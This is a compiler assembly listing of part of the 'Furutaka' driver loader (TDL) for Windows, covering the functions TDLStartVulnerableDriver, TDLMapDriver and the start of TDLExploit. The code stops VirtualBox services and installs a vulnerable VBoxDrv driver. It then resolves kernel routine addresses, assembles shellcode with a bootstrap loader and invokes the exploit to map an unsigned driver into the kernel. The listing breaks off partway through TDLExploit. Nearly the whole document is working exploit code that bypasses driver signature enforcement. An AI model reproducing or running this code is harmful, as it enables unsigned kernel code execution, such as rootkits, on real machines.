; COMDAT TDLStartVulnerableDriver
_TEXT SEGMENT
szDriverFileName$ = 48
DataSize$ = 1120
hDevice$ = 1128
TDLStartVulnerableDriver PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 501
$LN28:
mov QWORD PTR [rsp+24], rbx
mov QWORD PTR [rsp+32], rsi
push rbp
push rdi
push r15
lea rbp, QWORD PTR [rsp-832]
sub rsp, 1088 ; 00000440H
; Line 510
mov rdx, QWORD PTR g_hInstance
lea r8, QWORD PTR DataSize$[rbp-256]
and DWORD PTR DataSize$[rbp-256], 0
or rdi, -1
mov QWORD PTR hDevice$[rbp-256], rdi
xor ebx, ebx
lea r15d, QWORD PTR [rdi+2]
mov ecx, r15d
call supQueryResourceData
mov rsi, rax
; Line 511
test rax, rax
jne SHORT $LN4@TDLStartVu
; Line 512
mov rax, rdi
jmp $LN1@TDLStartVu
$LN4@TDLStartVu:
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
xor eax, eax
lea rdi, QWORD PTR szDriverFileName$[rsp]
mov ecx, 1040 ; 00000410H
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 518
mov edx, 260 ; 00000104H
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
rep stosb
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 518
lea rcx, QWORD PTR szDriverFileName$[rsp]
call QWORD PTR __imp_GetSystemDirectoryW
test eax, eax
jne SHORT $LN6@TDLStartVu
; Line 519
lea rcx, OFFSET FLAT:??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@
; Line 520
jmp $LN3@TDLStartVu
$LN6@TDLStartVu:
; Line 523
xor edx, edx
xor ecx, ecx
mov r8d, 983103 ; 000f003fH
call QWORD PTR __imp_OpenSCManagerW
mov rbx, rax
; Line 524
test rax, rax
jne SHORT $LN7@TDLStartVu
; Line 525
lea rcx, OFFSET FLAT:??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@
; Line 526
jmp $LN3@TDLStartVu
$LN7@TDLStartVu:
; Line 532
lea rdi, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@
mov rdx, rdi
lea rcx, OFFSET FLAT:??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@
call supIsObjectExists
test al, al
je $LN12@TDLStartVu
; Line 534
mov edx, r15d
lea rcx, OFFSET FLAT:??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@
call cuiPrintTextW
; Line 536
lea rdx, OFFSET FLAT:??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@
mov rcx, rbx
call supStopVBoxService
test al, al
jne SHORT $LN9@TDLStartVu
; Line 537
lea rcx, OFFSET FLAT:??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
; Line 538
jmp $LN3@TDLStartVu
$LN9@TDLStartVu:
; Line 541
lea rdx, OFFSET FLAT:??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@
mov rcx, rbx
call supStopVBoxService
test al, al
jne SHORT $LN10@TDLStartVu
; Line 542
lea rcx, OFFSET FLAT:??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
; Line 543
jmp $LN3@TDLStartVu
$LN10@TDLStartVu:
; Line 546
lea rdx, OFFSET FLAT:??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@
mov rcx, rbx
call supStopVBoxService
test al, al
jne SHORT $LN11@TDLStartVu
; Line 547
lea rcx, OFFSET FLAT:??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
; Line 548
jmp $LN3@TDLStartVu
$LN11@TDLStartVu:
; Line 551
mov ecx, 1000 ; 000003e8H
call QWORD PTR __imp_Sleep
; Line 553
mov rdx, rdi
mov rcx, rbx
call supStopVBoxService
test al, al
jne SHORT $LN12@TDLStartVu
; Line 554
lea rcx, OFFSET FLAT:??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
; Line 555
jmp $LN3@TDLStartVu
$LN12@TDLStartVu:
; Line 564
cmp DWORD PTR g_VBoxInstalled, 0
je SHORT $LN15@TDLStartVu
; Line 565
xor ecx, ecx
call supBackupVBoxDrv
; Line 566
lea rcx, OFFSET FLAT:??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
mov edx, r15d
test eax, eax
je SHORT $LN26@TDLStartVu
; Line 569
lea rcx, OFFSET FLAT:??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@
$LN26@TDLStartVu:
; Line 574
call cuiPrintTextW
$LN15@TDLStartVu:
lea rdx, OFFSET FLAT:??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@
lea rcx, QWORD PTR szDriverFileName$[rsp]
call _strcat_w
; Line 575
mov r8d, DWORD PTR DataSize$[rbp-256]
lea rcx, QWORD PTR szDriverFileName$[rsp]
and DWORD PTR [rsp+32], 0
xor r9d, r9d
mov rdx, rsi
call supWriteBufferToFile
; Line 578
cmp eax, DWORD PTR DataSize$[rbp-256]
je SHORT $LN16@TDLStartVu
; Line 579
lea rcx, OFFSET FLAT:??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@
; Line 580
jmp SHORT $LN3@TDLStartVu
$LN16@TDLStartVu:
; Line 584
cmp DWORD PTR g_VBoxInstalled, 0
jne SHORT $LN17@TDLStartVu
; Line 585
lea r8, QWORD PTR szDriverFileName$[rsp]
mov rdx, rdi
mov rcx, rbx
call scmInstallDriver
$LN17@TDLStartVu:
; Line 589
mov rdx, rdi
mov rcx, rbx
call scmStartDriver
test eax, eax
je SHORT $LN18@TDLStartVu
; Line 591
lea rdx, QWORD PTR hDevice$[rbp-256]
mov rcx, rdi
call scmOpenDevice
test eax, eax
lea rcx, OFFSET FLAT:??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
lea rdx, OFFSET FLAT:??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@
cmove rcx, rdx
; Line 596
jmp SHORT $LN3@TDLStartVu
$LN18@TDLStartVu:
; Line 598
lea rcx, OFFSET FLAT:??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
$LN3@TDLStartVu:
; Line 606
mov edx, r15d
call cuiPrintTextW
test rbx, rbx
je SHORT $LN22@TDLStartVu
; Line 607
mov rcx, rbx
call QWORD PTR __imp_CloseServiceHandle
$LN22@TDLStartVu:
; Line 609
mov rax, QWORD PTR hDevice$[rbp-256]
$LN1@TDLStartVu:
; Line 610
lea r11, QWORD PTR [rsp+1088]
mov rbx, QWORD PTR [r11+48]
mov rsi, QWORD PTR [r11+56]
mov rsp, r11
pop r15
pop rdi
pop rbp
ret 0
TDLStartVulnerableDriver ENDP
_TEXT ENDS
; Function compile flags: /Ogspy
; COMDAT TDLMapDriver
_TEXT SEGMENT
Image$ = 48
xExAllocatePoolWithTag$ = 56
xPsCreateSystemThread$ = 64
xZwClose$ = 72
memIO$ = 80
routineName$ = 88
uStr$ = 104
text$ = 128
lpDriverFullName$ = 704
DllCharacteristics$ = 712
Buffer$ = 720
KernelImage$ = 728
TDLMapDriver PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 323
$LN35:
mov QWORD PTR [rsp+8], rbx
push rbp
push rsi
push rdi
push r12
push r13
push r14
push r15
lea rbp, QWORD PTR [rsp-384]
sub rsp, 640 ; 00000280H
; Line 328
xor r13d, r13d
mov esi, 2
mov DWORD PTR DllCharacteristics$[rbp-256], esi
mov r14, rcx
mov QWORD PTR KernelImage$[rbp-256], r13
or r15d, -1 ; ffffffffH
; Line 329
mov QWORD PTR xExAllocatePoolWithTag$[rsp], r13
mov QWORD PTR xPsCreateSystemThread$[rsp], r13
mov QWORD PTR xZwClose$[rsp], r13
; Line 330
mov QWORD PTR Image$[rsp], r13
; Line 332
mov QWORD PTR Buffer$[rbp-256], r13
; Line 338
call supGetNtOsBase
mov rbx, rax
; Line 339
test rax, rax
je $LN3@TDLMapDriv
; Line 341
lea rdx, OFFSET FLAT:??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@
lea rcx, QWORD PTR text$[rbp-256]
call _strcpy_w
; Line 342
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rdx, rax
mov rcx, rbx
call u64tohex_w
; Line 343
lea r12d, QWORD PTR [rsi-1]
mov edx, r12d
lea rcx, QWORD PTR text$[rbp-256]
call cuiPrintTextW
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
xor eax, eax
lea ecx, QWORD PTR [rsi+14]
lea rdi, QWORD PTR uStr$[rsp]
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 346
mov rdx, r14
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
rep stosb
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 346
lea rcx, QWORD PTR uStr$[rsp]
call QWORD PTR __imp_RtlInitUnicodeString
; Line 347
lea r9, QWORD PTR Image$[rsp]
xor ecx, ecx
lea r8, QWORD PTR uStr$[rsp]
lea rdx, QWORD PTR DllCharacteristics$[rbp-256]
call QWORD PTR __imp_LdrLoadDll
; Line 348
test eax, eax
js $LN6@TDLMapDriv
cmp QWORD PTR Image$[rsp], r13
je $LN6@TDLMapDriv
; Line 353
lea rdx, OFFSET FLAT:??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@
lea rcx, QWORD PTR text$[rbp-256]
call _strcpy_w
; Line 354
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rcx, QWORD PTR Image$[rsp]
mov rdx, rax
call u64tohex_w
; Line 355
mov edx, r12d
lea rcx, QWORD PTR text$[rbp-256]
mov edi, r12d
call cuiPrintTextW
; Line 358
mov rcx, QWORD PTR Image$[rsp]
call QWORD PTR __imp_RtlImageNtHeader
; Line 359
test rax, rax
je $LN3@TDLMapDriv
; Line 362
mov r12d, DWORD PTR [rax+80]
; Line 364
lea rcx, OFFSET FLAT:??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@
mov edx, edi
call cuiPrintTextW
; Line 366
lea rdx, OFFSET FLAT:??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@
lea rcx, QWORD PTR uStr$[rsp]
call QWORD PTR __imp_RtlInitUnicodeString
; Line 367
lea r9, QWORD PTR KernelImage$[rbp-256]
xor edx, edx
lea r8, QWORD PTR uStr$[rsp]
xor ecx, ecx
call QWORD PTR __imp_LdrLoadDll
; Line 368
test eax, eax
js $LN10@TDLMapDriv
cmp QWORD PTR KernelImage$[rbp-256], r13
je $LN10@TDLMapDriv
; Line 373
lea rdx, OFFSET FLAT:??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@
lea rcx, QWORD PTR text$[rbp-256]
call _strcpy_w
; Line 374
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rcx, QWORD PTR KernelImage$[rbp-256]
mov rdx, rax
call u64tohex_w
; Line 375
mov edx, edi
lea rcx, QWORD PTR text$[rbp-256]
call cuiPrintTextW
; Line 378
lea rdx, OFFSET FLAT:??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@
lea rcx, QWORD PTR routineName$[rsp]
call QWORD PTR __imp_RtlInitString
; Line 379
mov rcx, QWORD PTR KernelImage$[rbp-256]
lea r9, QWORD PTR xExAllocatePoolWithTag$[rsp]
xor r8d, r8d
lea rdx, QWORD PTR routineName$[rsp]
call QWORD PTR __imp_LdrGetProcedureAddress
; Line 380
test eax, eax
js $LN13@TDLMapDriv
cmp QWORD PTR xExAllocatePoolWithTag$[rsp], r13
je $LN13@TDLMapDriv
; Line 385
lea rdx, OFFSET FLAT:??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@
lea rcx, QWORD PTR text$[rbp-256]
call _strcpy_w
; Line 386
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rcx, rbx
mov rdx, rax
sub rcx, QWORD PTR KernelImage$[rbp-256]
add rcx, QWORD PTR xExAllocatePoolWithTag$[rsp]
call u64tohex_w
; Line 387
mov edx, edi
lea rcx, QWORD PTR text$[rbp-256]
call cuiPrintTextW
; Line 390
mov r14d, 15063 ; 00003ad7H
cmp DWORD PTR g_NtBuildNumber, r14d
jae $LN19@TDLMapDriv
; Line 391
lea rdx, OFFSET FLAT:??_C@_0BF@OLMDGEDM@PsCreateSystemThread@
lea rcx, QWORD PTR routineName$[rsp]
call QWORD PTR __imp_RtlInitString
; Line 392
mov rcx, QWORD PTR KernelImage$[rbp-256]
lea r9, QWORD PTR xPsCreateSystemThread$[rsp]
xor r8d, r8d
lea rdx, QWORD PTR routineName$[rsp]
call QWORD PTR __imp_LdrGetProcedureAddress
; Line 393
test eax, eax
js $LN17@TDLMapDriv
cmp QWORD PTR xPsCreateSystemThread$[rsp], r13
je $LN17@TDLMapDriv
; Line 398
lea rdx, OFFSET FLAT:??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@
lea rcx, QWORD PTR text$[rbp-256]
call _strcpy_w
; Line 399
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rcx, rbx
mov rdx, rax
sub rcx, QWORD PTR KernelImage$[rbp-256]
add rcx, QWORD PTR xPsCreateSystemThread$[rsp]
call u64tohex_w
; Line 400
mov edx, edi
lea rcx, QWORD PTR text$[rbp-256]
call cuiPrintTextW
; Line 403
lea rdx, OFFSET FLAT:??_C@_07IPICGNAN@ZwClose@
lea rcx, QWORD PTR routineName$[rsp]
call QWORD PTR __imp_RtlInitString
; Line 404
mov rcx, QWORD PTR KernelImage$[rbp-256]
lea r9, QWORD PTR xZwClose$[rsp]
xor r8d, r8d
lea rdx, QWORD PTR routineName$[rsp]
call QWORD PTR __imp_LdrGetProcedureAddress
; Line 405
test eax, eax
js $LN20@TDLMapDriv
cmp QWORD PTR xZwClose$[rsp], r13
je $LN20@TDLMapDriv
; Line 410
lea rdx, OFFSET FLAT:??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@
lea rcx, QWORD PTR text$[rbp-256]
call _strcpy_w
; Line 411
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rcx, rbx
mov rdx, rax
sub rcx, QWORD PTR KernelImage$[rbp-256]
add rcx, QWORD PTR xZwClose$[rsp]
call u64tohex_w
; Line 412
mov edx, edi
lea rcx, QWORD PTR text$[rbp-256]
call cuiPrintTextW
$LN19@TDLMapDriv:
; Line 416
lea rax, QWORD PTR [r12+4096]
; Line 417
mov DWORD PTR [rsp+40], 64 ; 00000040H
lea r9, QWORD PTR memIO$[rsp]
mov QWORD PTR memIO$[rsp], rax
xor r8d, r8d
mov DWORD PTR [rsp+32], 12288 ; 00003000H
lea rdx, QWORD PTR Buffer$[rbp-256]
or rcx, -1
call QWORD PTR __imp_NtAllocateVirtualMemory
; Line 419
cmp QWORD PTR Buffer$[rbp-256], r13
jne SHORT $LN21@TDLMapDriv
; Line 420
mov edx, edi
lea rcx, OFFSET FLAT:??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@
; Line 421
jmp $LN33@TDLMapDriv
$LN20@TDLMapDriv:
; Line 406
mov edx, edi
lea rcx, OFFSET FLAT:??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@
; Line 407
jmp $LN33@TDLMapDriv
$LN17@TDLMapDriv:
; Line 394
mov edx, edi
lea rcx, OFFSET FLAT:??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@
; Line 395
jmp $LN33@TDLMapDriv
$LN21@TDLMapDriv:
; Line 424
lea rdx, OFFSET FLAT:??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@
lea rcx, QWORD PTR text$[rbp-256]
call _strcpy_w
; Line 425
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov rcx, QWORD PTR Buffer$[rbp-256]
mov rdx, rax
call u64tohex_w
; Line 426
mov edx, edi
lea rcx, QWORD PTR text$[rbp-256]
call cuiPrintTextW
; Line 433
mov rax, QWORD PTR Buffer$[rbp-256]
; Line 435
mov rcx, rbx
mov BYTE PTR [rax], 72 ; 00000048H
mov rax, QWORD PTR Buffer$[rbp-256]
mov BYTE PTR [rax+1], 185 ; 000000b9H
sub rcx, QWORD PTR KernelImage$[rbp-256]
mov rax, QWORD PTR Buffer$[rbp-256]
add rcx, QWORD PTR xExAllocatePoolWithTag$[rsp]
mov QWORD PTR [rax+2], rcx
; Line 438
mov eax, DWORD PTR g_NtBuildNumber
cmp eax, r14d
jae SHORT $LN23@TDLMapDriv
; Line 439
mov rax, QWORD PTR Buffer$[rbp-256]
; Line 441
mov rcx, rbx
; Line 448
mov r14d, 798 ; 0000031eH
mov BYTE PTR [rax+10], 72 ; 00000048H
mov rax, QWORD PTR Buffer$[rbp-256]
mov BYTE PTR [rax+11], 186 ; 000000baH
sub rcx, QWORD PTR KernelImage$[rbp-256]
add rcx, QWORD PTR xPsCreateSystemThread$[rsp]
mov rax, QWORD PTR Buffer$[rbp-256]
mov QWORD PTR [rax+12], rcx
mov rcx, rbx
mov rax, QWORD PTR Buffer$[rbp-256]
mov BYTE PTR [rax+20], 73 ; 00000049H
mov rax, QWORD PTR Buffer$[rbp-256]
mov BYTE PTR [rax+21], 184 ; 000000b8H
sub rcx, QWORD PTR KernelImage$[rbp-256]
mov rax, QWORD PTR Buffer$[rbp-256]
add rcx, QWORD PTR xZwClose$[rsp]
mov QWORD PTR [rax+22], rcx
mov ecx, 30
; Line 449
mov eax, DWORD PTR g_NtBuildNumber
jmp SHORT $LN24@TDLMapDriv
$LN23@TDLMapDriv:
; Line 451
mov ecx, 10
mov r14d, 778 ; 0000030aH
$LN24@TDLMapDriv:
; Line 456
add rcx, QWORD PTR Buffer$[rbp-256]
mov edx, 128 ; 00000080H
cmp eax, 15063 ; 00003ad7H
jae $LN25@TDLMapDriv
; Line 457
lea rax, OFFSET FLAT:TDLBootstrapLoader_code
lea edi, QWORD PTR [rdx-125]
$LL32@TDLMapDriv:
movups xmm0, XMMWORD PTR [rax]
movups XMMWORD PTR [rcx], xmm0
movups xmm1, XMMWORD PTR [rax+16]
movups XMMWORD PTR [rcx+16], xmm1
movups xmm0, XMMWORD PTR [rax+32]
movups XMMWORD PTR [rcx+32], xmm0
movups xmm1, XMMWORD PTR [rax+48]
movups XMMWORD PTR [rcx+48], xmm1
movups xmm0, XMMWORD PTR [rax+64]
movups XMMWORD PTR [rcx+64], xmm0
movups xmm1, XMMWORD PTR [rax+80]
movups XMMWORD PTR [rcx+80], xmm1
movups xmm0, XMMWORD PTR [rax+96]
movups XMMWORD PTR [rcx+96], xmm0
add rcx, rdx
movups xmm1, XMMWORD PTR [rax+112]
add rax, rdx
movups XMMWORD PTR [rcx-16], xmm1
sub rdi, 1
jne SHORT $LL32@TDLMapDriv
movups xmm0, XMMWORD PTR [rax]
; Line 460
mov edi, 1
movups XMMWORD PTR [rcx], xmm0
movups xmm1, XMMWORD PTR [rax+16]
movups XMMWORD PTR [rcx+16], xmm1
movups xmm0, XMMWORD PTR [rax+32]
movups XMMWORD PTR [rcx+32], xmm0
movups xmm1, XMMWORD PTR [rax+48]
movups XMMWORD PTR [rcx+48], xmm1
movups xmm0, XMMWORD PTR [rax+64]
movups XMMWORD PTR [rcx+64], xmm0
movups xmm1, XMMWORD PTR [rax+80]
movups XMMWORD PTR [rcx+80], xmm1
lea rcx, OFFSET FLAT:??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@
jmp SHORT $LN26@TDLMapDriv
$LN25@TDLMapDriv:
; Line 462
lea rax, OFFSET FLAT:TDLBootstrapLoader_code_w10rs2
$LL31@TDLMapDriv:
movups xmm0, XMMWORD PTR [rax]
movups XMMWORD PTR [rcx], xmm0
movups xmm1, XMMWORD PTR [rax+16]
movups XMMWORD PTR [rcx+16], xmm1
movups xmm0, XMMWORD PTR [rax+32]
movups XMMWORD PTR [rcx+32], xmm0
movups xmm1, XMMWORD PTR [rax+48]
movups XMMWORD PTR [rcx+48], xmm1
movups xmm0, XMMWORD PTR [rax+64]
movups XMMWORD PTR [rcx+64], xmm0
movups xmm1, XMMWORD PTR [rax+80]
movups XMMWORD PTR [rcx+80], xmm1
movups xmm0, XMMWORD PTR [rax+96]
movups XMMWORD PTR [rcx+96], xmm0
add rcx, rdx
movups xmm1, XMMWORD PTR [rax+112]
add rax, rdx
movups XMMWORD PTR [rcx-16], xmm1
sub rsi, rdi
jne SHORT $LL31@TDLMapDriv
movups xmm0, XMMWORD PTR [rax]
movups XMMWORD PTR [rcx], xmm0
movups xmm1, XMMWORD PTR [rax+16]
movups XMMWORD PTR [rcx+16], xmm1
movups xmm0, XMMWORD PTR [rax+32]
movups XMMWORD PTR [rcx+32], xmm0
movups xmm1, XMMWORD PTR [rax+48]
movups XMMWORD PTR [rcx+48], xmm1
mov al, BYTE PTR [rax+64]
mov BYTE PTR [rcx+64], al
; Line 464
lea rcx, OFFSET FLAT:??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@
$LN26@TDLMapDriv:
; Line 467
mov edx, edi
call cuiPrintTextW
mov rcx, QWORD PTR Buffer$[rbp-256]
mov r8, r12
mov rdx, QWORD PTR Image$[rsp]
mov edi, r14d
add rcx, rdi
call memcpy
; Line 469
mov esi, 1
lea rcx, OFFSET FLAT:??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@
mov edx, esi
call cuiPrintTextW
; Line 470
mov rcx, QWORD PTR Buffer$[rbp-256]
mov r8, rbx
mov rdx, QWORD PTR KernelImage$[rbp-256]
add rcx, rdi
call TDLResolveKernelImport
; Line 472
mov edx, esi
lea rcx, OFFSET FLAT:??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@
call cuiPrintTextW
; Line 473
mov rcx, QWORD PTR Buffer$[rbp-256]
lea edx, DWORD PTR [r12+4096]
mov r8d, r14d
call TDLExploit
; Line 474
mov r15d, r13d
; Line 475
jmp SHORT $LN3@TDLMapDriv
$LN13@TDLMapDriv:
; Line 381
mov edx, edi
lea rcx, OFFSET FLAT:??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@
; Line 382
jmp SHORT $LN33@TDLMapDriv
$LN10@TDLMapDriv:
; Line 369
mov edx, edi
lea rcx, OFFSET FLAT:??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
; Line 370
jmp SHORT $LN33@TDLMapDriv
$LN6@TDLMapDriv:
; Line 349
mov edx, r12d
lea rcx, OFFSET FLAT:??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
$LN33@TDLMapDriv:
; Line 478
call cuiPrintTextW
$LN3@TDLMapDriv:
cmp QWORD PTR Buffer$[rbp-256], r13
je SHORT $LN27@TDLMapDriv
; Line 480
mov r9d, 32768 ; 00008000H
mov QWORD PTR memIO$[rsp], r13
lea r8, QWORD PTR memIO$[rsp]
or rcx, -1
lea rdx, QWORD PTR Buffer$[rbp-256]
call QWORD PTR __imp_NtFreeVirtualMemory
$LN27@TDLMapDriv:
; Line 484
mov rbx, QWORD PTR [rsp+704]
mov eax, r15d
add rsp, 640 ; 00000280H
pop r15
pop r14
pop r13
pop r12
pop rdi
pop rsi
pop rbp
ret 0
TDLMapDriver ENDP
_TEXT ENDS
; Function compile flags: /Ogspy
; COMDAT TDLExploit
_TEXT SEGMENT
pLoadTask$ = 64
memIO$ = 72
Cookie$ = 80
vmFast$ = 136
ldrFree$ = 168
paramOut$ = 200
OpenLdr$ = 208
text$ = 272
Shellcode$ = 832
CodeSize$ = 840
DataOffset$ = 848
bytesIO$ = 856
TDLExploit PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 159
$LN26:
mov rax, rsp
mov QWORD PTR [rax+8], rbx
mov QWORD PTR [rax+16], rsi
mov QWORD PTR [rax+24], rdi
push rbp
push r12
push r13
push r14
push r15
lea rbp, QWORD PTR [rax-568]
sub rsp, 784 ; 00000310H
; Line 171
mov r10, QWORD PTR g_hVBox
xor r13d, r13d
mov r12d, r8d
mov r15, rcx
mov esi, edx
mov DWORD PTR bytesIO$[rbp-256], r13d
mov QWORD PTR pLoadTask$[rsp], r13
cmp r10, -1
je $LN13@TDLExploit
; Line 180
movups xmm0, XMMWORD PTR ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
xor eax, eax
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 182
mov QWORD PTR [rsp+56], r13
lea r9d, QWORD PTR [r13+48]
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
lea rdi, QWORD PTR Cookie$[rsp]
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 182
lea r8, QWORD PTR Cookie$[rsp]
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
lea edx, QWORD PTR [rax+56]
mov ecx, edx
rep stosb
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 182
lea rax, QWORD PTR bytesIO$[rbp-256]
mov DWORD PTR Cookie$[rsp+12], edx
mov QWORD PTR [rsp+48], rax
